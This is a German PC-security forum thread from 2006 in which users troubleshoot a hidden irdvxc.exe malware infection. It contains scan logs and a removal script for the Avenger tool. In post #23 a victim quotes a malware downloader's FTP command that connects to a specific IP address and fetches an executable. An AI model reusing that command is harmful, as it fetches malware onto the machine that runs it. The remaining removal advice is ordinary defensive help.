irdvxc.exe verursacht enorme Probleme

#16 soll ich einen kompletten scan machen, weil das dauert ja stunden.

#17 klar, komplett - egal wie lange es dauert.
__________
MfG Sabina

rund um die PC-Sicherheit

#18 so er ist jetzt doch fertig geworden


PROTOKOLL FÜR KASPERSKY ONLINE SCANNER
Donnerstag, 9. November 2006 16:21:26
Betriebssystem: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
Version von Kaspersky Online Scanner: 5.0.83.0
Letztes Update der Antiviren-Datenbanken: 9/11/2006
Anzahl der Einträge in den Antiviren-Datenbanken: 225873


Scan-Einstellungen
Folgende Antiviren-Datenbanken zur Untersuchung verwenden Standard
Archive untersuchen ja
Mail-Datenbanken untersuchen ja

Untersuchungsobjekt Kritische Objekte
C:\WINDOWS
C:\DOKUME~1\MEDIAM~1\LOKALE~1\Temp\

Untersuchungsergebnisse
Untersuchte Objekte insgesamt 31007
Viren gefunden 0
Infizierte Objekte gefunden 0 / 0
Verdächtige Objekte gefunden 0
Untersuchungszeit 00:36:28

Name des infizierten Objekts Virusname Letzte Aktion
C:\WINDOWS\Debug\PASSWD.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\SchedLgU.Txt Das Objekt ist gesperrt übersprungen

C:\WINDOWS\SoftwareDistribution\ReportingEvents.log Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\CatRoot2\edb.log Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\CatRoot2\tmp.edb Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\AppEvent.Evt Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\default Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\default.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SAM Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SAM.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SecEvent.Evt Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SECURITY Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SECURITY.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\software Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\software.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\SysEvent.Evt Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\system Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\config\system.LOG Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\h323log.txt Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Das Objekt ist gesperrt übersprungen

C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP Das Objekt ist gesperrt übersprungen

C:\WINDOWS\WindowsUpdate.log Das Objekt ist gesperrt übersprungen

Die Untersuchung wurde abgeschlossen.

#19 MarkusLittle

mache also die Windowsupdates - und falls es noch probleme geben sollte - melde dich
__________
MfG Sabina

rund um die PC-Sicherheit

#20 sabina, danke für die hilfe.

super support, danke danke

#21 Halllo bin neu hier also vezeiht mein unwissen !!!

Ich habe auch das gleiche problem mit dieser "irdvxc.exe" die sich nicht löschen lässt!?

[Wenn ich die EXE im TaskManager beende, aktiviert sich diese erneut ... erst beim dritten mal beenden bleibt diese dann "inaktiv".
Die Datei liegt versteckt unter C:\Windows\sytsem32]

ich verfolge den post schon den ganzen tag & bin auch nur zu denn gleichen ergebnissen wie meine vorgänger gekommen !

Und was mich am meisten stört ist das diese jene EXE immer traffic ins internet
hat und das komische ist das es ein upload ist !!?? Sind meine daten etwa auch kopiert worden ? Oder was passiert mir ?

Ich hoffe das kann erst mal helfen

Ich benutze Avast 4.7 Home Edition
Ashampoo FireWall Version 1.10
Denn CleanUp habe ich schon gemacht
Hier noch die daten vom hijackthis.log & ComboFix.txt
Ich hoff es so richtig & im voraus auch schon mal Danke

- - - - - - - - - - - - - - -hijackthis.log - - - - - - - - - - - - - - - - - - - - - - -
Logfile of HijackThis v1.99.1
Scan saved at 20:05:59, on 09.11.2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Programme\Alwil Software\Avast4\aswUpdSv.exe
C:\Programme\Alwil Software\Avast4\ashServ.exe
C:\Programme\BUFFALO\Client Manager3\bwsvc\bwsvc.exe
C:\WINDOWS\System32\irdvxc.exe
C:\WINDOWS\System32\SLEE503.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Gemeinsame Dateien\Ulead Systems\DVD\ULCDRSvr.exe
C:\Programme\Raxco\PerfectDisk\PDSched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\Mixer.exe
C:\WINDOWS\System32\LVCOMSX.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Programme\Alwil Software\Avast4\ashMaiSv.exe
C:\Programme\Java\j2re1.4.2_04\bin\jusched.exe
C:\Programme\D-Tools\daemon.exe
C:\Programme\Elaborate Bytes\CloneCD\CloneCDTray.exe
C:\Programme\Alwil Software\Avast4\ashWebSv.exe
C:\Programme\Pinnacle\PCTV Stereo\Remote\Remoterm.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe
C:\Programme\HP\hpcoretech\hpcmpmgr.exe
C:\WINDOWS\System32\hphmon05.exe
C:\Programme\T-DSL SpeedManager\SpeedMgr.exe
C:\Programme\Ashampoo\Ashampoo FireWall\FireWall.exe
C:\Programme\WinRoll\winroll.exe
C:\WINDOWS\System32\HPZipm12.exe
C:\Programme\Pinnacle\Shared Files\Programs\Scheduler\PCLEScheduler.exe
C:\Programme\BUFFALO\Client Manager3\cm3_tray.exe
C:\Programme\T-DSL SpeedManager\TSMSvc.exe
C:\WINDOWS\System32\taskmgr.exe
C:\Programme\Mozilla Firefox 2 Beta 2\firefox.exe
C:\Dokumente und Einstellungen\fOrm@t\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://google.icq.com/search/search_frame.php
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [System Files Updater] C:\WINDOWS\FlyakiteOSX\Tools\System Files Updater.exe /S
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [CloneCDElbyCDFL] "C:\Programme\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
O4 - HKLM\..\Run: [awxDTools] rundll32 C:\PROGRA~1\arniWORX\AWXDTO~1\awxDTools.dll,awxRegisterDll /r /s
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\System32\LVCOMSX.EXE
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programme\Java\j2re1.4.2_04\bin\jusched.exe
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Programme\D-Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\System32\NeroCheck.exe
O4 - HKLM\..\Run: [CloneCDTray] C:\Programme\Elaborate Bytes\CloneCD\CloneCDTray.exe
O4 - HKLM\..\Run: [PCTVRemote] C:\Programme\Pinnacle\PCTV Stereo\Remote\Remoterm.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe
O4 - HKLM\..\Run: [HPHUPD05] C:\Programme\Hewlett-Packard\\{5372B9A6-6E51-4f90-9B40-E0A3B8475C4E}\hphupd05.exe
O4 - HKLM\..\Run: [HP Component Manager] "C:\Programme\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HPHmon05] C:\WINDOWS\System32\hphmon05.exe
O4 - HKLM\..\Run: [T-DSL SpeedMgr] "C:\Programme\T-DSL SpeedManager\SpeedMgr.exe"
O4 - HKLM\..\Run: [UVS10 Preload] C:\Programme\Ulead Systems\Ulead VideoStudio 10\uvPL.exe
O4 - HKLM\..\Run: [Ashampoo FireWall] "C:\Programme\Ashampoo\Ashampoo FireWall\FireWall.exe" -TRAY
O4 - HKCU\..\Run: [WinRoll] "C:\Programme\WinRoll\winroll.exe"
O4 - Startup: ClientManager3.lnk = C:\Programme\BUFFALO\Client Manager3\cm3_tray.exe
O4 - Global Startup: Pinnacle Scheduler.lnk = C:\Programme\Pinnacle\Shared Files\Programs\Scheduler\PCLEScheduler.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O10 - Unknown file in Winsock LSP: c:\programme\ashampoo\ashampoo firewall\spi.dll
O16 - DPF: {B91AEDBE-93DF-4017-8BB3-F1C300C0EC51} -
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Programme\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Programme\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Programme\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Programme\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: Bwsvc - BUFFALO INC. - C:\Programme\BUFFALO\Client Manager3\bwsvc\bwsvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Network helper Service (MSDisk) - Unknown owner - C:\WINDOWS\System32\irdvxc.exe" /service (file missing)
O23 - Service: PDEngine - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDEngine.exe
O23 - Service: PDScheduler (PDSched) - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDSched.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: Steganos Live Encryption Engine (Version 503) [Service] (SLEE_503_SERVICE) - Unknown owner - C:\WINDOWS\System32\SLEE503.exe
O23 - Service: Steganos Live Encryption Engine 8.1 [Service] (SLEE_81_SERVICE) - Unknown owner - (no file)
O23 - Service: T-DSL SpeedManager (TSMService) - T-Systems Business Services - C:\Programme\T-DSL SpeedManager\TSMSvc.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Programme\Gemeinsame Dateien\Ulead Systems\DVD\ULCDRSvr.exe

- - - - - - - - - - - - -ComboFix.txt - - - - - - - - - - - - - - - - - - - - - - - -
fOrm@t - 06-11-09 21:48:48.37 Service Pack 1
ComboFix 06.11.9 - Running from: "E:\Internet TEMP"

((((((((((((((((((((((((((((((( Files Created from 2006-10-09 to 2006-11-09 ))))))))))))))))))))))))))))))))))


2006-11-07 16:11 50,176 --ahs---- C:\WINDOWS\system32\irdvxc.exe
2006-11-07 16:11 50,176 --ahs---- C:\WINDOWS\system32\.exe
2006-11-05 12:21 129,784 --------- C:\WINDOWS\system32\pxafs.dll
2006-11-04 23:29 966,144 --a------ C:\WINDOWS\system32\NCTAudioInformation2.dll
2006-11-04 23:29 877,568 --a------ C:\WINDOWS\system32\NCTAudioFile2.dll
2006-11-04 23:29 634,880 --a------ C:\WINDOWS\system32\NCTAudioEditor2.dll
2006-11-04 23:29 522,752 --a------ C:\WINDOWS\system32\NCTAudioTransform2.dll
2006-11-04 23:29 467,968 --a------ C:\WINDOWS\system32\NCTAudioRecord2.dll
2006-11-04 23:29 467,456 --a------ C:\WINDOWS\system32\NCTAudioPlayer2.dll
2006-11-04 16:21 209,920 --a------ C:\WINDOWS\system32\advert.dll
2006-11-04 16:21 1,812 --a------ C:\WINDOWS\system32\mp3rec.dll
2006-11-04 16:20 299,008 --a------ C:\WINDOWS\uninst.exe
2006-11-04 10:53 966,656 --a------ C:\WINDOWS\system32\dxdiag.exe
2006-11-04 10:53 73,216 --a------ C:\WINDOWS\system32\dpvsetup.exe
2006-11-04 10:53 363,520 --a------ C:\WINDOWS\system32\gcdef.dll
2006-11-04 10:52 611,328 --a------ C:\WINDOWS\system32\dpvoice.dll
2006-11-04 10:49 68,888 --a------ C:\WINDOWS\system32\xinput1_3.dll
2006-11-04 10:49 62,744 --a------ C:\WINDOWS\system32\xinput1_2.dll
2006-11-04 10:49 237,848 --a------ C:\WINDOWS\system32\xactengine2_4.dll
2006-11-04 10:49 236,824 --a------ C:\WINDOWS\system32\xactengine2_3.dll
2006-11-04 10:49 2,414,360 --a------ C:\WINDOWS\system32\d3dx9_31.dll
2006-11-04 10:49 15,128 --a------ C:\WINDOWS\system32\x3daudio1_1.dll
2006-10-30 12:07 70,912 --a------ C:\WINDOWS\system32\drivers\Rtlnicxp.sys
2006-10-30 09:50 182,880 --a------ C:\WINDOWS\system32\iuengine.dll
2006-10-26 14:03 90,112 --a------ C:\WINDOWS\system32\AVASTSS.scr


(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))


2006-11-09 21:38 -------- d-------- C:\Programme\Mozilla Firefox 2 Beta 2
2006-11-09 21:34 -------- d-------- C:\Programme\CleanUp!
2006-11-09 21:04 50176 --ahs---- C:\WINDOWS\system32\.exe
2006-11-06 00:02 -------- d-------- C:\Programme\eMule
2006-11-05 14:00 -------- d-------- C:\Programme\Gemeinsame Dateien\NSV
2006-11-05 14:00 -------- d-------- C:\Programme\Gemeinsame Dateien
2006-11-05 13:56 -------- d-------- C:\Programme\Winamp
2006-11-05 12:38 -------- d-------- C:\Programme\Screamer Radio
2006-11-04 23:44 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\concept design
2006-11-04 23:35 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Real
2006-11-04 23:32 -------- d-------- C:\Programme\Real
2006-11-04 23:32 -------- d-------- C:\Programme\Gemeinsame Dateien\xing shared
2006-11-04 23:32 -------- d-------- C:\Programme\Gemeinsame Dateien\Real
2006-11-04 11:21 -------- d-------- C:\Programme\Winamp3
2006-11-04 02:24 -------- d-------- C:\Programme\Ulead Systems
2006-11-04 02:16 -------- d--h----- C:\Programme\InstallShield Installation Information
2006-11-04 00:50 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\BitTorrent
2006-11-03 16:39 -------- d-------- C:\Programme\ICQLite
2006-11-02 23:49 -------- d-------- C:\Programme\BitTorrent
2006-11-02 23:19 -------- d-------- C:\Programme\T-DSL SpeedManager
2006-11-02 23:19 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\T-DSL SpeedManager
2006-10-30 10:32 -------- d--h----- C:\Programme\WindowsUpdate
2006-10-30 00:01 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Mp3tag
2006-10-29 00:44 98304 --a------ C:\WINDOWS\system32\CmdLineExt.dll
2006-10-29 00:19 -------- d-------- C:\Programme\Sierra
2006-10-28 14:19 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\dvdcss
2006-10-27 22:10 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Steganos Security Suite 6
2006-10-27 21:16 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\ICQLite
2006-10-27 08:59 -------- d-------- C:\Programme\TVgenial
2006-10-26 15:21 -------- d-------- C:\Programme\Ashampoo
2006-10-26 13:40 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Talkback
2006-10-26 13:40 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Mozilla
2006-10-26 13:17 -------- d-------- C:\Programme\Online-Dienste
2006-10-25 22:13 -------- d-------- C:\Programme\GameJack 5
2006-10-22 19:18 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Macromedia
2006-10-07 16:47 -------- d-------- C:\Programme\Ubisoft
2006-10-07 14:21 -------- d-------- C:\Programme\jv16 PowerTools
2006-10-07 14:20 41 --a------ C:\WINDOWS\system32\fbeabacfc6_s.dll
2006-10-06 21:01 -------- d-------- C:\Programme\EA GAMES
2006-10-06 21:01 -------- d-------- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\InstallShield Installation Information
2006-10-05 13:15 -------- d-------- C:\Programme\Gemeinsame Dateien\Wise Installation Wizard
2006-10-05 12:53 -------- d---s---- C:\Dokumente und Einstellungen\fOrm@t\Anwendungsdaten\Microsoft
2006-10-05 10:57 -------- d-------- C:\Programme\iColorFolder
2006-10-05 10:55 -------- d-------- C:\Programme\Windows NT
2006-10-05 10:55 -------- d-------- C:\Programme\Windows Media Player
2006-10-05 10:55 -------- d-------- C:\Programme\Outlook Express
2006-10-05 10:55 -------- d-------- C:\Programme\Movie Maker
2006-10-05 10:55 -------- d-------- C:\Programme\Internet Explorer
2006-10-05 10:55 -------- d-------- C:\Programme\Gemeinsame Dateien\System
2006-09-29 12:56 21840 --a----t- C:\WINDOWS\system32\SIntfNT.dll
2006-09-29 12:56 17212 --a----t- C:\WINDOWS\system32\SIntf32.dll
2006-09-29 12:56 12067 --a----t- C:\WINDOWS\system32\SIntf16.dll
2006-09-28 16:03 63768 --a------ C:\WINDOWS\system32\dxdllreg.exe
2006-09-25 17:06 -------- d-------- C:\Programme\Gemeinsame Dateien\Ulead Systems
2006-09-25 16:45 666240 --a------ C:\WINDOWS\system32\aswBoot.exe
2006-09-25 16:40 87424 --a------ C:\WINDOWS\system32\drivers\aswmon2.sys
2006-09-25 16:40 85952 --a------ C:\WINDOWS\system32\drivers\aswmon.sys
2006-09-25 16:39 36176 --a------ C:\WINDOWS\system32\drivers\aswTdi.sys
2006-09-25 16:39 16352 --a------ C:\WINDOWS\system32\drivers\aswRdr.sys
2006-09-25 16:37 24560 --a------ C:\WINDOWS\system32\drivers\aavmker4.sys
2006-09-23 00:35 -------- d-------- C:\Programme\DivX
2006-09-19 17:33 -------- d-------- C:\Programme\UnH Solutions
2006-09-17 19:07 -------- d-------- C:\Programme\CUEcards
2006-09-15 21:25 86016 --a------ C:\WINDOWS\system32\OpenAL32.dll
2006-09-15 21:25 262144 --a------ C:\WINDOWS\system32\wrap_oal.dll
2006-09-09 23:57 -------- d-------- C:\Programme\a-squared HiJackFree
2006-09-09 00:41 -------- d-------- C:\Programme\Gemeinsame Dateien\Microsoft Shared
2006-08-27 16:52 175 --a------ C:\install.bat
2006-08-25 04:47 115880 --------- C:\WINDOWS\system32\pxinsi64.exe
2006-08-14 01:48 1865216 --a------ C:\WINDOWS\system32\ntkrnlpa.exe
2006-08-14 01:48 1836544 --a------ C:\WINDOWS\system32\ntoskrnl.exe
2006-08-14 01:46 203264 --a------ C:\WINDOWS\system32\uxtheme.dll
2006-08-11 18:35 520192 --a------ C:\WINDOWS\system32\DivXsm.exe
2006-08-11 18:31 778240 --a------ C:\WINDOWS\system32\divx_xx0c.dll
2006-08-11 18:31 778240 --a------ C:\WINDOWS\system32\divx_xx07.dll
2006-08-11 18:31 761856 --a------ C:\WINDOWS\system32\divx_xx11.dll
2006-08-11 18:31 620180 --a------ C:\WINDOWS\system32\DivX.dll
2006-08-11 18:31 12288 --a------ C:\WINDOWS\system32\DivXWMPExtType.dll
2006-08-11 18:31 118784 --a------ C:\WINDOWS\system32\DivXCodecUpdateChecker.exe


(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"WinRoll"="\"C:\\Programme\\WinRoll\\winroll.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"System Files Updater"="C:\\WINDOWS\\FlyakiteOSX\\Tools\\System Files Updater.exe /S"
"C-Media Mixer"="Mixer.exe /startup"
"QuickTime Task"="\"C:\\Programme\\QuickTime\\qttask.exe\" -atboottime"
"CloneCDElbyCDFL"="\"C:\\Programme\\Elaborate Bytes\\CloneCD\\ElbyCheck.exe\" /L ElbyCDFL"
"awxDTools"="rundll32 C:\\PROGRA~1\\arniWORX\\AWXDTO~1\\awxDTools.dll,awxRegisterDll /r /s"
"LVCOMSX"="C:\\WINDOWS\\System32\\LVCOMSX.EXE"
"SoundMan"="SOUNDMAN.EXE"
"KernelFaultCheck"=hex(2):25,73,79,73,74,65,6d,72,6f,6f,74,25,5c,73,79,73,74,\
65,6d,33,32,5c,64,75,6d,70,72,65,70,20,30,20,2d,6b,00
"SunJavaUpdateSched"="C:\\Programme\\Java\\j2re1.4.2_04\\bin\\jusched.exe"
"DAEMON Tools-1033"="\"C:\\Programme\\D-Tools\\daemon.exe\" -lang 1033"
"NeroFilterCheck"="C:\\WINDOWS\\System32\\NeroCheck.exe"
"CloneCDTray"="C:\\Programme\\Elaborate Bytes\\CloneCD\\CloneCDTray.exe"
"PCTVRemote"="C:\\Programme\\Pinnacle\\PCTV Stereo\\Remote\\Remoterm.exe"
"avast!"="C:\\PROGRA~1\\ALWILS~1\\Avast4\\ashDisp.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb09.exe"
"HPHUPD05"="C:\\Programme\\Hewlett-Packard\\\\{5372B9A6-6E51-4f90-9B40-E0A3B8475C4E}\\hphupd05.exe"
"HP Component Manager"="\"C:\\Programme\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HPHmon05"="C:\\WINDOWS\\System32\\hphmon05.exe"
"T-DSL SpeedMgr"="\"C:\\Programme\\T-DSL SpeedManager\\SpeedMgr.exe\""
"UVS10 Preload"="C:\\Programme\\Ulead Systems\\Ulead VideoStudio 10\\uvPL.exe"
"Ashampoo FireWall"="\"C:\\Programme\\Ashampoo\\Ashampoo FireWall\\FireWall.exe\" -TRAY"

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components]
"DeskHtmlVersion"=dword:00000110
"DeskHtmlMinorVersion"=dword:00000005
"Settings"=dword:00000001
"GeneralFlags"=dword:00000000

[HKEY_USERS\.default\software\microsoft\windows\currentversion\run]
"CTFMON.EXE"="C:\\WINDOWS\\System32\\CTFMON.EXE"
"SSS6_Suite"="\"C:\\Programme\\Steganos Security Suite 6\\sss.exe\" /booting"
"SSS6_SAFE"="\"C:\\Programme\\Steganos Security Suite 6\\safe.exe\" /booting"
"SSS6_SPM"="\"C:\\Programme\\Steganos Security Suite 6\\spm.exe\" /booting"

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\run]
"CTFMON.EXE"="C:\\WINDOWS\\System32\\CTFMON.EXE"
"SSS6_Suite"="\"C:\\Programme\\Steganos Security Suite 6\\sss.exe\" /booting"
"SSS6_SAFE"="\"C:\\Programme\\Steganos Security Suite 6\\safe.exe\" /booting"
"SSS6_SPM"="\"C:\\Programme\\Steganos Security Suite 6\\spm.exe\" /booting"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\sharedtaskscheduler]
"{438755C2-A8BA-11D1-B96B-00A0C90312E1}"="Browseui preloader"
"{8C7461EF-2B13-11d2-BE35-3078302C2030}"="Component Categories cache daemon"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{AEB6717E-7E19-11d0-97EE-00C04FD91972}"=""

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoDriveTypeAutoRun"=dword:00000099
"NoLowDiskSpaceChecks"=dword:00000000

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer\Run]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"dontdisplaylastusername"=dword:00000000
"legalnoticecaption"=""
"legalnoticetext"=""
"shutdownwithoutlogon"=dword:00000001
"undockwithoutlogon"=dword:00000001

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\policies\explorer]
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\shellserviceobjectdelayload]
"PostBootReminder"="{7849596a-48ea-486e-8937-a2a3009f31a9}"
"CDBurn"="{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"WebCheck"="{E6FB5E20-DE35-11CF-9C87-00AA005127ED}"
"SysTray"="{35CEC8A3-2BE6-11D2-8773-92E220524153}"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"


Contents of the 'Scheduled Tasks' folder
C:\WINDOWS\tasks\HP Usg Daily.job

Completion time: 06-11-09 21:49:08.85
C:\ComboFix.txt ... 06-11-09 21:49


Ich hoffe ihr könnt mir irgendwie helfen !

#22 smArtfOrmAt

Avenger
http://virus-protect.org/artikel/tools/avenger.html
kopiere rein

Zitat

registry keys to delete:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MSDISK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDisk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MSDISK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSDisk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_MSDISK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\MSDisk
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MSDISK
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDisk

Files to delete:
C:\WINDOWS\system32\irdvxc.exe
C:\WINDOWS\system32\.exe

Klicke die grüne Ampel
das Script wird nun ausgeführt, dann wird der PC automatisch neustarten

poste das log vom avenger, was nach neustart erscheint

**
Arbeitsplatz-->Rechtsklick, dann auf Eigenschaften--->Reiter Systemwiederherstellung--->Häkchen setzen bei Systemwiederherstellung auf allen Laufwerken deaktivieren. (dann wieder aktivieren)

**
scanne mit kaspersky und poste den scanreport
http://virus-protect.org/onlinescan.html
__________
MfG Sabina

rund um die PC-Sicherheit

#23 Also von gestern nacht bis jetzt hab ich damit verbracht mein system zu updaten und hatte auch schon die "irdvxc.exe" gekillt doch nach intensiver durchforstung meines systems habe ich festelleln müssen das ich noch drei fisse kollegen an board habe -[Trojan-Downloader.BAT.Ftp.ab]-& Etc . dazu fdand ich diese datei mit dem verweiss auf diese ip:
open 89.166.178.188 20027 ..user 1 1 ..get eraseme_76806.exe ..quit .. (dateiname:i.___ .) Die ich auch schon gelöscht habe !! trotz alle dem hier sind erstmal die log´s

Danke für denn support Sabina

Logfile of The Avenger version 1, by Swandog46
Running from registry key:
\Registry\Machine\System\CurrentControlSet\Services\karynmbk

*******************

Script file located at: \??\C:\WINDOWS\vcjdqoyc.txt
Script file opened successfully.

Script file read successfully

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:
